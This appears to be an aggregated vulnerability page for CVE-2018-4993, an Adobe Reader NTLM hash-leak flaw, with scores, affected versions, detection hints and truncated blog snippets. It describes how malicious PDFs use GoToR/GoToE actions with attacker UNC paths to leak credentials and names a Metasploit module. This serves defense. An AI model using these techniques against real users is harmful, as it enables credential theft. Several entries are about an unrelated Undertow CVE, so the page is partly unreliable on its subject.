CVE-2018-4993
published 2018-07-09CVE-2018-4993: Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an NTLM SSO hash theft…
PriorityP268high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
86.52%
99.7th percentile
Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an NTLM SSO hash theft vulnerability. Successful exploitation could lead to information disclosure.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adobe | acrobat_dc | 15.006.30060 – 15.006.30417 | — |
| adobe | acrobat_dc | 15.008.20082 – 18.011.20038 | — |
| adobe | acrobat_dc | 17.011.30059 – 17.011.30079 | — |
| adobe | acrobat_reader_dc | 15.006.30060 – 15.006.30417 | — |
| adobe | acrobat_reader_dc | 15.008.20082 – 18.011.20038 | — |
| adobe | acrobat_reader_dc | 17.011.30059 – 17.011.30079 | — |
| pdf-xchange | pdf-xchange_editor | < 8.0.330.0 | 8.0.330.0 |
Detection & IOCsextracted from sources · hover to see the quote
- →Look for PDF files containing /AA (Additional Actions) dictionary entries with /O (page open) actions using /S /GoToR or /S /GoToE action types pointing to UNC (\\server\share) paths in the /F field — this triggers automatic NTLM credential leakage to an attacker-controlled SMB server. ↗
- →The incomplete May 2018 patch (APSB18-09) only fixed GoToR action type; malicious PDFs exploiting the unpatched GoToE (GoToEmbedded) action type bypass the fix and were observed in the wild submitted to VirusTotal in May 2018. ↗
- →The Metasploit module 'auxiliary/fileformat/badpdf' generates malicious PDFs embedding a UNC link for NetNTLM credential capture; hunt for PDF files created by or matching the structure of this module. ↗
- ·Both GoToR (GoToRemote) and GoToE (GoToEmbedded) action types are vulnerable; the May 2018 patch (APSB18-09) only addressed GoToR. Detections must cover both /S /GoToR and /S /GoToE in PDF /AA dictionaries to avoid missing the bypass variant (CVE-2018-15979). ↗
- ·All Windows PDF viewers are affected, not just Adobe products — scope detection and blocking rules to cover any PDF reader process initiating SMB connections. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
ghsa6.1MEDIUM
vendor_redhat6.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2pj4-mr9m-qwww: Tracker PDF-XChange Editor before 8
ghsa_unreviewed·2022-05-24·CVSS 7.5
CVE-2019-17497 [HIGH] CWE-522 GHSA-2pj4-mr9m-qwww: Tracker PDF-XChange Editor before 8
Tracker PDF-XChange Editor before 8.0.330.0 has an NTLM SSO hash theft vulnerability using crafted FDF or XFDF files (a related issue to CVE-2018-4993). For example, an NTLM hash is sent for a link to \\192.168.0.2\C$\file.pdf without user interaction.
GHSA
GHSA-4rxx-6c3r-g2p4: Adobe Acrobat and Reader versions 2018
ghsa_unreviewed·2022-05-14
CVE-2018-4993 [HIGH] CWE-200 GHSA-4rxx-6c3r-g2p4: Adobe Acrobat and Reader versions 2018
Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an NTLM SSO hash theft vulnerability. Successful exploitation could lead to information disclosure.
GHSA
Improper Neutralization of CRLF Sequences in HTTP Headers in Undertow
ghsa·2022-05-13·CVSS 6.1
CVE-2018-1067 [MEDIUM] CWE-113 Improper Neutralization of CRLF Sequences in HTTP Headers in Undertow
Improper Neutralization of CRLF Sequences in HTTP Headers in Undertow
In Undertow before versions 7.1.2.CR1, 7.1.2.GA it was found that the fix for CVE-2016-4993 was incomplete and Undertow web server is vulnerable to the injection of arbitrary HTTP headers, and also response splitting, due to insufficient sanitization and validation of user input before the input is used as part of an HTTP header value.
Red Hat
undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993)
vendor_redhat·2018-04-25·CVSS 6.1
CVE-2018-1067 [MEDIUM] CWE-113 undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993)
undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993)
In Undertow before versions 7.1.2.CR1, 7.1.2.GA it was found that the fix for CVE-2016-4993 was incomplete and Undertow web server is vulnerable to the injection of arbitrary HTTP headers, and also response splitting, due to insufficient sanitization and validation of user input before the input is used as part of an HTTP header value.
It was found that the fix for CVE-2016-4993 was incomplete and Undertow web server is vulnerable to the injection of arbitrary HTTP headers, and also response splitting, due to insufficient sanitization and validation of user input before the input is used as part of an HTTP header value.
Package: tomcat5 (Red Hat Enterprise Linux 5) - Not affected
Package: t
No detection rules found.
Sentinelone
Malicious PDFs | Revealing the Techniques Behind the Attacks
blogs_sentinelone·2019-03-27
Malicious PDFs | Revealing the Techniques Behind the Attacks
Most of us are no strangers to phishing attempts, and over the years we’ve kept you informed about the latest tricks used by attackers in the epidemic of phishing and spear-phishing campaigns that plague, in particular, email users. Like other files that can come as attachments or links in an email, PDF files have received their fair share of attention from threat actors, too. In this post, we’ll take you on a tour of the technical aspects behind malicious PDF files: what they are, how they work, and how we can protect ourselves from them.
## How Do PDF Files Execute Code?
Regular readers of the SentinelOne blog will be familiar with the idea of malicious Office attachments that run VBA code from Macros or use DDE to deliver attacks, but not so well-known is how PDFs can execute code.
I
Tenable
Adobe Patches Incomplete Fix for NTLM Credential Leaking Bug (CVE-2018-15979)
blogs_tenable·2018-11-14·CVSS 7.5
CVE-2018-15979 [HIGH] Adobe Patches Incomplete Fix for NTLM Credential Leaking Bug (CVE-2018-15979)
Blog / Cyber Exposure Alerts
Subscribe
# Adobe Patches Incomplete Fix for NTLM Credential Leaking Bug (CVE-2018-15979)
Satnam Narang
November 14, 2018
2 Min Read
Researchers have reported an incomplete fix for CVE-2018-4993, an NTLM credential leaking vulnerability that was supposed to be patched in May 2018. Adobe has now released a complete fix.
### Background
On November 13, Adobe published its monthly security bulletins as part of its monthly release cycle in conjunction with Microsoft’s Patch Tuesday. The November security bulletins include a fix for a vulnerability that was believed to have been patched in May 2018’s security bulletins. However, security researchers at EdgeSpot discovered that the May 2018 fix was incomplete.
### Vulnerability details
Researchers at Check Po
Tenable
Adobe Patches Incomplete Fix for NTLM Credential Leaking Bug (CVE-2018-15979)
blogs_tenable·2018-11-14·CVSS 7.5
[HIGH] Adobe Patches Incomplete Fix for NTLM Credential Leaking Bug (CVE-2018-15979)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Checkpoint
NTLM Credentials Theft via PDF Files
blogs_checkpoint·2018-04-26
CVE-2018-4993 NTLM Credentials Theft via PDF Files
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## NTLM Credentials Theft via PDF Files
Just a few days after it was reported that malicious actors can exploit a vulnerability in MS outlook using OLE to steal a Windows user’s NTLM hashes,
Zscaler
Zscaler protects against 38 new vulnerabilities for Adobe Fl
blogs_zscaler
Zscaler protects against 38 new vulnerabilities for Adobe Fl
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Bugzilla
CVE-2018-1067 wildfly: undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993) [fedora-all]
bugzilla·2018-06-19·CVSS 6.1
CVE-2018-1067 [MEDIUM] CVE-2018-1067 wildfly: undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993) [fedora-all]
CVE-2018-1067 wildfly: undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993) [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message
Bugzilla
CVE-2018-1067 undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993)
bugzilla·2018-03-01·CVSS 6.1
CVE-2018-1067 [MEDIUM] CVE-2018-1067 undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993)
CVE-2018-1067 undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993)
A flaw was reported in WildFly 12.0.0.CR1 web server is vulnerable to the injection of arbitrary HTTP Header due to insufficient sanitisation and validation of user UTF-8 encoded input before it is used as part of an HTTP header value.
Although there is a protection against CRLF injection by detecting the presence of a NewLine character (0x0a), it can be bypassed using characters encoded in UTF-8 as the page will try to convert them back to the original Unicode form and extract the last byte.
Discussion:
Acknowledgments:
Name: Ammarit Thongthua (Deloitte Thailand Pentest team), Nattakit Intarasorn (Deloitte Thailand Pentest team)
---
This issue has been addressed in the fol
2018-07-09
Published